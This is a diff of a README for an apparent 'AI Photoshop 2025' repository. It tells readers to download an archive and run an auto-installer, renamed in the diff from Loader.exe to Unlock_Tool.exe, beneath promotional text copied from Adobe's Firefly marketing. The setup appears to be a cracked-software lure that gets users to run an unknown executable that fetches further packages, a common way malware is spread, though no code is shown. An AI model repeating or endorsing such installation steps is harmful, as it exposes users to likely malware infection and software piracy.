Amst24/AI-Photoshop-2025/README.md

 Installation

 1. Download the archive from releases and extract it to a convenient folder.
-2. Run the auto-installer Loader.exe.
+2. Run the auto-installer Unlock_Tool.exe.
 It will install and download all necessary packages for > operation.

 The future of Photoshop is here with generative AI.
 Make any creative vision a reality while keeping complete control over every concept with Adobe Firefly generative AI in Photoshop.
 Try select generative AI features in your browser right now with Photoshop on the web.